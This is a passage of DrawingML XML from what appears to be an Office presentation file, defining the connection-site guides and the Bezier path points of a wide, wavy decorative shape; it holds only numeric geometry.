                <a:gd name="connsiteY22" fmla="*/ 755431 h 1203824"/>
                <a:gd name="connsiteX23" fmla="*/ 9352590 w 12192000"/>
                <a:gd name="connsiteY23" fmla="*/ 760650 h 1203824"/>
                <a:gd name="connsiteX24" fmla="*/ 9211614 w 12192000"/>
                <a:gd name="connsiteY24" fmla="*/ 796248 h 1203824"/>
                <a:gd name="connsiteX25" fmla="*/ 9084667 w 12192000"/>
                <a:gd name="connsiteY25" fmla="*/ 815303 h 1203824"/>
                <a:gd name="connsiteX26" fmla="*/ 8863666 w 12192000"/>
                <a:gd name="connsiteY26" fmla="*/ 859298 h 1203824"/>
                <a:gd name="connsiteX27" fmla="*/ 8813796 w 12192000"/>
                <a:gd name="connsiteY27" fmla="*/ 862070 h 1203824"/>
                <a:gd name="connsiteX28" fmla="*/ 8659351 w 12192000"/>
                <a:gd name="connsiteY28" fmla="*/ 882406 h 1203824"/>
                <a:gd name="connsiteX29" fmla="*/ 8571352 w 12192000"/>
                <a:gd name="connsiteY29" fmla="*/ 893639 h 1203824"/>
                <a:gd name="connsiteX30" fmla="*/ 8464106 w 12192000"/>
                <a:gd name="connsiteY30" fmla="*/ 918004 h 1203824"/>
                <a:gd name="connsiteX31" fmla="*/ 8278324 w 12192000"/>
                <a:gd name="connsiteY31" fmla="*/ 963769 h 1203824"/>
                <a:gd name="connsiteX32" fmla="*/ 8229128 w 12192000"/>
                <a:gd name="connsiteY32" fmla="*/ 973810 h 1203824"/>
                <a:gd name="connsiteX33" fmla="*/ 8139751 w 12192000"/>
                <a:gd name="connsiteY33" fmla="*/ 995815 h 1203824"/>
                <a:gd name="connsiteX34" fmla="*/ 8123571 w 12192000"/>
                <a:gd name="connsiteY34" fmla="*/ 999822 h 1203824"/>
                <a:gd name="connsiteX35" fmla="*/ 7988699 w 12192000"/>
                <a:gd name="connsiteY35" fmla="*/ 1042479 h 1203824"/>
                <a:gd name="connsiteX36" fmla="*/ 7917214 w 12192000"/>
                <a:gd name="connsiteY36" fmla="*/ 1054565 h 1203824"/>
                <a:gd name="connsiteX37" fmla="*/ 7710915 w 12192000"/>
                <a:gd name="connsiteY37" fmla="*/ 1084190 h 1203824"/>
                <a:gd name="connsiteX38" fmla="*/ 7622959 w 12192000"/>
                <a:gd name="connsiteY38" fmla="*/ 1093150 h 1203824"/>
                <a:gd name="connsiteX39" fmla="*/ 7410782 w 12192000"/>
                <a:gd name="connsiteY39" fmla="*/ 1109640 h 1203824"/>
                <a:gd name="connsiteX40" fmla="*/ 7277754 w 12192000"/>
                <a:gd name="connsiteY40" fmla="*/ 1121822 h 1203824"/>
                <a:gd name="connsiteX41" fmla="*/ 7124540 w 12192000"/>
                <a:gd name="connsiteY41" fmla="*/ 1132918 h 1203824"/>
                <a:gd name="connsiteX42" fmla="*/ 6949752 w 12192000"/>
                <a:gd name="connsiteY42" fmla="*/ 1151058 h 1203824"/>
                <a:gd name="connsiteX43" fmla="*/ 6630249 w 12192000"/>
                <a:gd name="connsiteY43" fmla="*/ 1176063 h 1203824"/>
                <a:gd name="connsiteX44" fmla="*/ 6320634 w 12192000"/>
                <a:gd name="connsiteY44" fmla="*/ 1198901 h 1203824"/>
                <a:gd name="connsiteX45" fmla="*/ 6192343 w 12192000"/>
                <a:gd name="connsiteY45" fmla="*/ 1198323 h 1203824"/>
                <a:gd name="connsiteX46" fmla="*/ 5966562 w 12192000"/>
                <a:gd name="connsiteY46" fmla="*/ 1203723 h 1203824"/>
                <a:gd name="connsiteX47" fmla="*/ 5867227 w 12192000"/>
                <a:gd name="connsiteY47" fmla="*/ 1201847 h 1203824"/>
                <a:gd name="connsiteX48" fmla="*/ 5630172 w 12192000"/>
                <a:gd name="connsiteY48" fmla="*/ 1202248 h 1203824"/>
                <a:gd name="connsiteX49" fmla="*/ 5348949 w 12192000"/>
                <a:gd name="connsiteY49" fmla="*/ 1191768 h 1203824"/>
                <a:gd name="connsiteX50" fmla="*/ 5241228 w 12192000"/>
                <a:gd name="connsiteY50" fmla="*/ 1192408 h 1203824"/>
                <a:gd name="connsiteX51" fmla="*/ 4971133 w 12192000"/>
                <a:gd name="connsiteY51" fmla="*/ 1193559 h 1203824"/>
                <a:gd name="connsiteX52" fmla="*/ 4869416 w 12192000"/>
                <a:gd name="connsiteY52" fmla="*/ 1200519 h 1203824"/>
                <a:gd name="connsiteX53" fmla="*/ 4753274 w 12192000"/>
                <a:gd name="connsiteY53" fmla="*/ 1200850 h 1203824"/>
                <a:gd name="connsiteX54" fmla="*/ 4611883 w 12192000"/>
                <a:gd name="connsiteY54" fmla="*/ 1192701 h 1203824"/>
                <a:gd name="connsiteX55" fmla="*/ 4376825 w 12192000"/>
                <a:gd name="connsiteY55" fmla="*/ 1184131 h 1203824"/>
                <a:gd name="connsiteX56" fmla="*/ 4285471 w 12192000"/>
                <a:gd name="connsiteY56" fmla="*/ 1187158 h 1203824"/>
                <a:gd name="connsiteX57" fmla="*/ 3866543 w 12192000"/>
                <a:gd name="connsiteY57" fmla="*/ 1181596 h 1203824"/>
                <a:gd name="connsiteX58" fmla="*/ 3651342 w 12192000"/>
                <a:gd name="connsiteY58" fmla="*/ 1174348 h 1203824"/>
                <a:gd name="connsiteX59" fmla="*/ 3518453 w 12192000"/>
                <a:gd name="connsiteY59" fmla="*/ 1177258 h 1203824"/>
                <a:gd name="connsiteX60" fmla="*/ 3400818 w 12192000"/>
                <a:gd name="connsiteY60" fmla="*/ 1169685 h 1203824"/>
                <a:gd name="connsiteX61" fmla="*/ 3037154 w 12192000"/>
                <a:gd name="connsiteY61" fmla="*/ 1153217 h 1203824"/>
                <a:gd name="connsiteX62" fmla="*/ 2866260 w 12192000"/>
                <a:gd name="connsiteY62" fmla="*/ 1132283 h 1203824"/>
                <a:gd name="connsiteX63" fmla="*/ 2582173 w 12192000"/>
                <a:gd name="connsiteY63" fmla="*/ 1088979 h 1203824"/>
                <a:gd name="connsiteX64" fmla="*/ 2395406 w 12192000"/>
                <a:gd name="connsiteY64" fmla="*/ 1035945 h 1203824"/>
                <a:gd name="connsiteX65" fmla="*/ 2294751 w 12192000"/>
                <a:gd name="connsiteY65" fmla="*/ 1014618 h 1203824"/>
                <a:gd name="connsiteX66" fmla="*/ 2122944 w 12192000"/>
                <a:gd name="connsiteY66" fmla="*/ 984751 h 1203824"/>
                <a:gd name="connsiteX67" fmla="*/ 1905504 w 12192000"/>
                <a:gd name="connsiteY67" fmla="*/ 941380 h 1203824"/>
                <a:gd name="connsiteX68" fmla="*/ 1671045 w 12192000"/>
                <a:gd name="connsiteY68" fmla="*/ 924228 h 1203824"/>
                <a:gd name="connsiteX69" fmla="*/ 1543856 w 12192000"/>
                <a:gd name="connsiteY69" fmla="*/ 898190 h 1203824"/>
                <a:gd name="connsiteX70" fmla="*/ 1419784 w 12192000"/>
                <a:gd name="connsiteY70" fmla="*/ 868500 h 1203824"/>
                <a:gd name="connsiteX71" fmla="*/ 1355116 w 12192000"/>
                <a:gd name="connsiteY71" fmla="*/ 849214 h 1203824"/>
                <a:gd name="connsiteX72" fmla="*/ 1223713 w 12192000"/>
                <a:gd name="connsiteY72" fmla="*/ 821702 h 1203824"/>
                <a:gd name="connsiteX73" fmla="*/ 1094193 w 12192000"/>
                <a:gd name="connsiteY73" fmla="*/ 804872 h 1203824"/>
                <a:gd name="connsiteX74" fmla="*/ 1001115 w 12192000"/>
                <a:gd name="connsiteY74" fmla="*/ 783030 h 1203824"/>
                <a:gd name="connsiteX75" fmla="*/ 879548 w 12192000"/>
                <a:gd name="connsiteY75" fmla="*/ 747884 h 1203824"/>
                <a:gd name="connsiteX76" fmla="*/ 711163 w 12192000"/>
                <a:gd name="connsiteY76" fmla="*/ 719039 h 1203824"/>
                <a:gd name="connsiteX77" fmla="*/ 557941 w 12192000"/>
                <a:gd name="connsiteY77" fmla="*/ 707101 h 1203824"/>
                <a:gd name="connsiteX78" fmla="*/ 480347 w 12192000"/>
                <a:gd name="connsiteY78" fmla="*/ 668702 h 1203824"/>
                <a:gd name="connsiteX79" fmla="*/ 296224 w 12192000"/>
                <a:gd name="connsiteY79" fmla="*/ 603583 h 1203824"/>
                <a:gd name="connsiteX80" fmla="*/ 72689 w 12192000"/>
                <a:gd name="connsiteY80" fmla="*/ 560892 h 1203824"/>
                <a:gd name="connsiteX81" fmla="*/ 0 w 12192000"/>
                <a:gd name="connsiteY81" fmla="*/ 543486 h 1203824"/>
                <a:gd name="connsiteX82" fmla="*/ 0 w 12192000"/>
                <a:gd name="connsiteY82" fmla="*/ 384357 h 1203824"/>
                <a:gd name="connsiteX83" fmla="*/ 51784 w 12192000"/>
                <a:gd name="connsiteY83" fmla="*/ 393937 h 1203824"/>
                <a:gd name="connsiteX84" fmla="*/ 205561 w 12192000"/>
                <a:gd name="connsiteY84" fmla="*/ 414859 h 1203824"/>
                <a:gd name="connsiteX85" fmla="*/ 354391 w 12192000"/>
                <a:gd name="connsiteY85" fmla="*/ 426667 h 1203824"/>
                <a:gd name="connsiteX86" fmla="*/ 448281 w 12192000"/>
                <a:gd name="connsiteY86" fmla="*/ 436308 h 1203824"/>
                <a:gd name="connsiteX87" fmla="*/ 611518 w 12192000"/>
                <a:gd name="connsiteY87" fmla="*/ 434166 h 1203824"/>
                <a:gd name="connsiteX88" fmla="*/ 746076 w 12192000"/>
                <a:gd name="connsiteY88" fmla="*/ 422520 h 1203824"/>
                <a:gd name="connsiteX89" fmla="*/ 902724 w 12192000"/>
                <a:gd name="connsiteY89" fmla="*/ 409989 h 1203824"/>
                <a:gd name="connsiteX90" fmla="*/ 1113854 w 12192000"/>
                <a:gd name="connsiteY90" fmla="*/ 414230 h 1203824"/>
                <a:gd name="connsiteX91" fmla="*/ 1333449 w 12192000"/>
                <a:gd name="connsiteY91" fmla="*/ 459938 h 1203824"/>
                <a:gd name="connsiteX92" fmla="*/ 1408608 w 12192000"/>
                <a:gd name="connsiteY92" fmla="*/ 458278 h 1203824"/>
                <a:gd name="connsiteX93" fmla="*/ 1630191 w 12192000"/>
                <a:gd name="connsiteY93" fmla="*/ 403061 h 1203824"/>
                <a:gd name="connsiteX94" fmla="*/ 1956289 w 12192000"/>
                <a:gd name="connsiteY94" fmla="*/ 332366 h 1203824"/>
                <a:gd name="connsiteX95" fmla="*/ 2042814 w 12192000"/>
                <a:gd name="connsiteY95" fmla="*/ 344002 h 1203824"/>
                <a:gd name="connsiteX96" fmla="*/ 2183420 w 12192000"/>
                <a:gd name="connsiteY96" fmla="*/ 369635 h 1203824"/>
                <a:gd name="connsiteX97" fmla="*/ 2269566 w 12192000"/>
                <a:gd name="connsiteY97" fmla="*/ 439859 h 1203824"/>
                <a:gd name="connsiteX98" fmla="*/ 2331129 w 12192000"/>
                <a:gd name="connsiteY98" fmla="*/ 524163 h 1203824"/>
                <a:gd name="connsiteX99" fmla="*/ 2385112 w 12192000"/>
                <a:gd name="connsiteY99" fmla="*/ 555357 h 1203824"/>
                <a:gd name="connsiteX100" fmla="*/ 2444033 w 12192000"/>
                <a:gd name="connsiteY100" fmla="*/ 572629 h 1203824"/>
                <a:gd name="connsiteX101" fmla="*/ 2525979 w 12192000"/>
                <a:gd name="connsiteY101" fmla="*/ 603233 h 1203824"/>
                <a:gd name="connsiteX102" fmla="*/ 2603911 w 12192000"/>
                <a:gd name="connsiteY102" fmla="*/ 684825 h 1203824"/>
                <a:gd name="connsiteX103" fmla="*/ 2678828 w 12192000"/>
                <a:gd name="connsiteY103" fmla="*/ 706990 h 1203824"/>
                <a:gd name="connsiteX104" fmla="*/ 2738094 w 12192000"/>
                <a:gd name="connsiteY104" fmla="*/ 711376 h 1203824"/>
                <a:gd name="connsiteX105" fmla="*/ 2983806 w 12192000"/>
                <a:gd name="connsiteY105" fmla="*/ 728243 h 1203824"/>
                <a:gd name="connsiteX106" fmla="*/ 3013997 w 12192000"/>
                <a:gd name="connsiteY106" fmla="*/ 725446 h 1203824"/>
                <a:gd name="connsiteX107" fmla="*/ 3364419 w 12192000"/>
                <a:gd name="connsiteY107" fmla="*/ 720577 h 1203824"/>
                <a:gd name="connsiteX108" fmla="*/ 3460521 w 12192000"/>
                <a:gd name="connsiteY108" fmla="*/ 717628 h 1203824"/>
                <a:gd name="connsiteX109" fmla="*/ 3710982 w 12192000"/>
                <a:gd name="connsiteY109" fmla="*/ 714182 h 1203824"/>
                <a:gd name="connsiteX110" fmla="*/ 3850961 w 12192000"/>
                <a:gd name="connsiteY110" fmla="*/ 778802 h 1203824"/>
                <a:gd name="connsiteX111" fmla="*/ 3946286 w 12192000"/>
                <a:gd name="connsiteY111" fmla="*/ 816372 h 1203824"/>
                <a:gd name="connsiteX112" fmla="*/ 4065132 w 12192000"/>
                <a:gd name="connsiteY112" fmla="*/ 832459 h 1203824"/>
                <a:gd name="connsiteX113" fmla="*/ 4132173 w 12192000"/>
                <a:gd name="connsiteY113" fmla="*/ 835167 h 1203824"/>
                <a:gd name="connsiteX114" fmla="*/ 4305858 w 12192000"/>
                <a:gd name="connsiteY114" fmla="*/ 804156 h 1203824"/>
                <a:gd name="connsiteX115" fmla="*/ 4382131 w 12192000"/>
                <a:gd name="connsiteY115" fmla="*/ 769481 h 1203824"/>
                <a:gd name="connsiteX116" fmla="*/ 4453289 w 12192000"/>
                <a:gd name="connsiteY116" fmla="*/ 752531 h 1203824"/>
                <a:gd name="connsiteX117" fmla="*/ 4657971 w 12192000"/>
                <a:gd name="connsiteY117" fmla="*/ 795835 h 1203824"/>
                <a:gd name="connsiteX118" fmla="*/ 4682399 w 12192000"/>
                <a:gd name="connsiteY118" fmla="*/ 813876 h 1203824"/>
                <a:gd name="connsiteX119" fmla="*/ 4771814 w 12192000"/>
                <a:gd name="connsiteY119" fmla="*/ 907046 h 1203824"/>
                <a:gd name="connsiteX120" fmla="*/ 4827520 w 12192000"/>
                <a:gd name="connsiteY120" fmla="*/ 929876 h 1203824"/>
                <a:gd name="connsiteX121" fmla="*/ 4849942 w 12192000"/>
                <a:gd name="connsiteY121" fmla="*/ 933851 h 1203824"/>
                <a:gd name="connsiteX122" fmla="*/ 5009626 w 12192000"/>
                <a:gd name="connsiteY122" fmla="*/ 957896 h 1203824"/>
                <a:gd name="connsiteX123" fmla="*/ 5158711 w 12192000"/>
                <a:gd name="connsiteY123" fmla="*/ 963814 h 1203824"/>
                <a:gd name="connsiteX124" fmla="*/ 5376427 w 12192000"/>
                <a:gd name="connsiteY124" fmla="*/ 963151 h 1203824"/>
                <a:gd name="connsiteX125" fmla="*/ 5475787 w 12192000"/>
                <a:gd name="connsiteY125" fmla="*/ 980508 h 1203824"/>
                <a:gd name="connsiteX126" fmla="*/ 5653401 w 12192000"/>
                <a:gd name="connsiteY126" fmla="*/ 987268 h 1203824"/>
                <a:gd name="connsiteX127" fmla="*/ 5726340 w 12192000"/>
                <a:gd name="connsiteY127" fmla="*/ 985357 h 1203824"/>
                <a:gd name="connsiteX128" fmla="*/ 5790563 w 12192000"/>
                <a:gd name="connsiteY128" fmla="*/ 991300 h 1203824"/>
                <a:gd name="connsiteX129" fmla="*/ 5860260 w 12192000"/>
                <a:gd name="connsiteY129" fmla="*/ 1004958 h 1203824"/>
                <a:gd name="connsiteX130" fmla="*/ 6042101 w 12192000"/>
                <a:gd name="connsiteY130" fmla="*/ 1036226 h 1203824"/>
                <a:gd name="connsiteX131" fmla="*/ 6301998 w 12192000"/>
                <a:gd name="connsiteY131" fmla="*/ 989138 h 1203824"/>
                <a:gd name="connsiteX132" fmla="*/ 6452025 w 12192000"/>
                <a:gd name="connsiteY132" fmla="*/ 968489 h 1203824"/>
                <a:gd name="connsiteX133" fmla="*/ 6589205 w 12192000"/>
                <a:gd name="connsiteY133" fmla="*/ 939474 h 1203824"/>
                <a:gd name="connsiteX134" fmla="*/ 6631069 w 12192000"/>
                <a:gd name="connsiteY134" fmla="*/ 911222 h 1203824"/>
                <a:gd name="connsiteX135" fmla="*/ 6828274 w 12192000"/>
                <a:gd name="connsiteY135" fmla="*/ 942941 h 1203824"/>
                <a:gd name="connsiteX136" fmla="*/ 6900803 w 12192000"/>
                <a:gd name="connsiteY136" fmla="*/ 984140 h 1203824"/>
                <a:gd name="connsiteX137" fmla="*/ 7034668 w 12192000"/>
                <a:gd name="connsiteY137" fmla="*/ 1018665 h 1203824"/>
                <a:gd name="connsiteX138" fmla="*/ 7281067 w 12192000"/>
                <a:gd name="connsiteY138" fmla="*/ 966327 h 1203824"/>
                <a:gd name="connsiteX139" fmla="*/ 7412780 w 12192000"/>
                <a:gd name="connsiteY139" fmla="*/ 909206 h 1203824"/>
                <a:gd name="connsiteX140" fmla="*/ 7500327 w 12192000"/>
                <a:gd name="connsiteY140" fmla="*/ 894826 h 1203824"/>
                <a:gd name="connsiteX141" fmla="*/ 7662324 w 12192000"/>
                <a:gd name="connsiteY141" fmla="*/ 927415 h 1203824"/>
                <a:gd name="connsiteX142" fmla="*/ 7725334 w 12192000"/>
                <a:gd name="connsiteY142" fmla="*/ 924844 h 1203824"/>
                <a:gd name="connsiteX143" fmla="*/ 7833279 w 12192000"/>
                <a:gd name="connsiteY143" fmla="*/ 913031 h 1203824"/>
                <a:gd name="connsiteX144" fmla="*/ 7928605 w 12192000"/>
                <a:gd name="connsiteY144" fmla="*/ 881683 h 1203824"/>
                <a:gd name="connsiteX145" fmla="*/ 8146597 w 12192000"/>
                <a:gd name="connsiteY145" fmla="*/ 762968 h 1203824"/>
                <a:gd name="connsiteX146" fmla="*/ 8183577 w 12192000"/>
                <a:gd name="connsiteY146" fmla="*/ 749005 h 1203824"/>
                <a:gd name="connsiteX147" fmla="*/ 8250224 w 12192000"/>
                <a:gd name="connsiteY147" fmla="*/ 733642 h 1203824"/>
                <a:gd name="connsiteX148" fmla="*/ 8505929 w 12192000"/>
                <a:gd name="connsiteY148" fmla="*/ 626542 h 1203824"/>
                <a:gd name="connsiteX149" fmla="*/ 8564194 w 12192000"/>
                <a:gd name="connsiteY149" fmla="*/ 618796 h 1203824"/>
                <a:gd name="connsiteX150" fmla="*/ 8660705 w 12192000"/>
                <a:gd name="connsiteY150" fmla="*/ 611069 h 1203824"/>
                <a:gd name="connsiteX151" fmla="*/ 8762255 w 12192000"/>
                <a:gd name="connsiteY151" fmla="*/ 585060 h 1203824"/>
                <a:gd name="connsiteX152" fmla="*/ 8836439 w 12192000"/>
                <a:gd name="connsiteY152" fmla="*/ 566358 h 1203824"/>
                <a:gd name="connsiteX153" fmla="*/ 9050728 w 12192000"/>
                <a:gd name="connsiteY153" fmla="*/ 559575 h 1203824"/>
                <a:gd name="connsiteX154" fmla="*/ 9229627 w 12192000"/>
                <a:gd name="connsiteY154" fmla="*/ 557464 h 1203824"/>
                <a:gd name="connsiteX155" fmla="*/ 9253451 w 12192000"/>
                <a:gd name="connsiteY155" fmla="*/ 550855 h 1203824"/>
                <a:gd name="connsiteX156" fmla="*/ 9484214 w 12192000"/>
                <a:gd name="connsiteY156" fmla="*/ 498671 h 1203824"/>
                <a:gd name="connsiteX157" fmla="*/ 9582633 w 12192000"/>
                <a:gd name="connsiteY157" fmla="*/ 458384 h 1203824"/>
                <a:gd name="connsiteX158" fmla="*/ 9719670 w 12192000"/>
                <a:gd name="connsiteY158" fmla="*/ 415607 h 1203824"/>
                <a:gd name="connsiteX159" fmla="*/ 9871784 w 12192000"/>
                <a:gd name="connsiteY159" fmla="*/ 366147 h 1203824"/>
                <a:gd name="connsiteX160" fmla="*/ 9984494 w 12192000"/>
                <a:gd name="connsiteY160" fmla="*/ 336660 h 1203824"/>
                <a:gd name="connsiteX161" fmla="*/ 10154708 w 12192000"/>
                <a:gd name="connsiteY161" fmla="*/ 322193 h 1203824"/>
                <a:gd name="connsiteX162" fmla="*/ 10190446 w 12192000"/>
                <a:gd name="connsiteY162" fmla="*/ 325025 h 1203824"/>
                <a:gd name="connsiteX163" fmla="*/ 10530736 w 12192000"/>
                <a:gd name="connsiteY163" fmla="*/ 335953 h 1203824"/>
                <a:gd name="connsiteX164" fmla="*/ 10752157 w 12192000"/>
                <a:gd name="connsiteY164" fmla="*/ 305117 h 1203824"/>
                <a:gd name="connsiteX165" fmla="*/ 10824452 w 12192000"/>
                <a:gd name="connsiteY165" fmla="*/ 285927 h 1203824"/>
                <a:gd name="connsiteX166" fmla="*/ 10953152 w 12192000"/>
                <a:gd name="connsiteY166" fmla="*/ 228102 h 1203824"/>
                <a:gd name="connsiteX167" fmla="*/ 11011614 w 12192000"/>
                <a:gd name="connsiteY167" fmla="*/ 214096 h 1203824"/>
                <a:gd name="connsiteX168" fmla="*/ 11116031 w 12192000"/>
                <a:gd name="connsiteY168" fmla="*/ 195421 h 1203824"/>
                <a:gd name="connsiteX169" fmla="*/ 11344303 w 12192000"/>
                <a:gd name="connsiteY169" fmla="*/ 166629 h 1203824"/>
                <a:gd name="connsiteX170" fmla="*/ 11639050 w 12192000"/>
                <a:gd name="connsiteY170" fmla="*/ 108526 h 1203824"/>
                <a:gd name="connsiteX171" fmla="*/ 11757532 w 12192000"/>
                <a:gd name="connsiteY171" fmla="*/ 96530 h 1203824"/>
                <a:gd name="connsiteX172" fmla="*/ 11885799 w 12192000"/>
                <a:gd name="connsiteY172" fmla="*/ 86728 h 1203824"/>
                <a:gd name="connsiteX173" fmla="*/ 11922874 w 12192000"/>
                <a:gd name="connsiteY173" fmla="*/ 81060 h 1203824"/>
                <a:gd name="connsiteX174" fmla="*/ 12115331 w 12192000"/>
                <a:gd name="connsiteY174" fmla="*/ 33587 h 1203824"/>
                <a:gd name="connsiteX175" fmla="*/ 12158080 w 12192000"/>
                <a:gd name="connsiteY175" fmla="*/ 14081 h 1203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</a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12192000" h="1203824">
                  <a:moveTo>
                    <a:pt x="12192000" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12192000" y="463429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12190876" y="463512"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12153133" y="467010"/>
                    <a:pt x="12115042" y="473200"/>
                    <a:pt x="12077245" y="476327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12046307" y="479040"/>
                    <a:pt x="12015359" y="479114"/>
                    <a:pt x="11984517" y="479927"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11973265" y="480210"/>
                    <a:pt x="11961485" y="476792"/>
                    <a:pt x="11951600" y="478957"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11853497" y="501074"/>
                    <a:pt x="11777036" y="475730"/>
                    <a:pt x="11690904" y="471970"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11600358" y="467893"/>
                    <a:pt x="11511400" y="454530"/>
                    <a:pt x="11413965" y="476172"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11355010" y="489304"/>
                    <a:pt x="11299073" y="508237"/>
                    <a:pt x="11240739" y="523169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11219994" y="528395"/>
                    <a:pt x="11196384" y="531385"/>
                    <a:pt x="11175005" y="532169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11071819" y="536506"/>
                    <a:pt x="10971303" y="549336"/>
                    <a:pt x="10873726" y="580253"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10856992" y="585473"/>
                    <a:pt x="10839156" y="590660"/>
                    <a:pt x="10821306" y="593207"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10723500" y="607162"/>
                    <a:pt x="10626924" y="616976"/>
                    <a:pt x="10530811" y="612184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10498527" y="610559"/>
                    <a:pt x="10460885" y="619895"/>
                    <a:pt x="10426049" y="623354"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10393740" y="626644"/>
                    <a:pt x="10360820" y="630774"/>
                    <a:pt x="10329156" y="630948"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10282924" y="631125"/>
                    <a:pt x="10240698" y="636395"/>
                    <a:pt x="10194727" y="648617"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10150847" y="660165"/>
                    <a:pt x="10102287" y="664450"/>
                    <a:pt x="10055906" y="671256"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10004174" y="678826"/>
                    <a:pt x="9952442" y="686395"/>
                    <a:pt x="9900551" y="692855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9879793" y="695439"/>
                    <a:pt x="9855180" y="691398"/>
                    <a:pt x="9838464" y="696804"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9784563" y="714690"/>
                    <a:pt x="9727517" y="710557"/>
                    <a:pt x="9672957" y="723816"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9646220" y="730464"/>
                    <a:pt x="9614440" y="727257"/>
                    <a:pt x="9585066" y="730692"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9537047" y="736221"/>
                    <a:pt x="9489294" y="743601"/>
                    <a:pt x="9441407" y="750055"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9425674" y="752111"/>
                    <a:pt x="9410218" y="753561"/>
                    <a:pt x="9394459" y="755431"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9380484" y="757048"/>
                    <a:pt x="9365611" y="757472"/>
                    <a:pt x="9352590" y="760650"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9305415" y="772102"/>
                    <a:pt x="9259379" y="786411"/>
                    <a:pt x="9211614" y="796248"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9170220" y="804796"/>
                    <a:pt x="9126523" y="807444"/>
                    <a:pt x="9084667" y="815303"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9010868" y="829042"/>
                    <a:pt x="8937412" y="845188"/>
                    <a:pt x="8863666" y="859298"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8847706" y="862330"/>
                    <a:pt x="8830271" y="860096"/>
                    <a:pt x="8813796" y="862070"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8762262" y="868479"/>
                    <a:pt x="8710833" y="875626"/>
                    <a:pt x="8659351" y="882406"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8630055" y="886396"/>
                    <a:pt x="8600505" y="891179"/>
                    <a:pt x="8571352" y="893639"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8532843" y="896868"/>
                    <a:pt x="8497743" y="898476"/>
                    <a:pt x="8464106" y="918004"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8412327" y="948238"/>
                    <a:pt x="8341122" y="949523"/>
                    <a:pt x="8278324" y="963769"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8262086" y="967408"/>
                    <a:pt x="8245335" y="969987"/>
                    <a:pt x="8229128" y="973810"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8199180" y="980915"/>
                    <a:pt x="8169646" y="988338"/>
                    <a:pt x="8139751" y="995815"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8134478" y="997132"/>
                    <a:pt x="8128438" y="998185"/>
                    <a:pt x="8123571" y="999822"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8078628" y="1014164"/>
                    <a:pt x="8034565" y="1029514"/>
                    <a:pt x="7988699" y="1042479"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7966302" y="1048884"/>
                    <a:pt x="7941011" y="1052871"/>
                    <a:pt x="7917214" y="1054565"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7847636" y="1059584"/>
                    <a:pt x="7779165" y="1067276"/>
                    <a:pt x="7710915" y="1084190"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7683826" y="1090885"/>
                    <a:pt x="7652466" y="1090640"/>
                    <a:pt x="7622959" y="1093150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7552361" y="1098691"/>
                    <a:pt x="7481710" y="1103861"/>
                    <a:pt x="7410782" y="1109640"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7366505" y="1113312"/>
                    <a:pt x="7322030" y="1118147"/>
                    <a:pt x="7277754" y="1121822"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7226619" y="1125906"/>
                    <a:pt x="7175601" y="1128277"/>
                    <a:pt x="7124540" y="1132918"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7066293" y="1138207"/>
                    <a:pt x="7008028" y="1145955"/>
                    <a:pt x="6949752" y="1151058"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6843217" y="1160027"/>
                    <a:pt x="6736882" y="1167834"/>
                    <a:pt x="6630249" y="1176063"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6526849" y="1184018"/>
                    <a:pt x="6423556" y="1192713"/>
                    <a:pt x="6320634" y="1198901"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6277297" y="1201496"/>
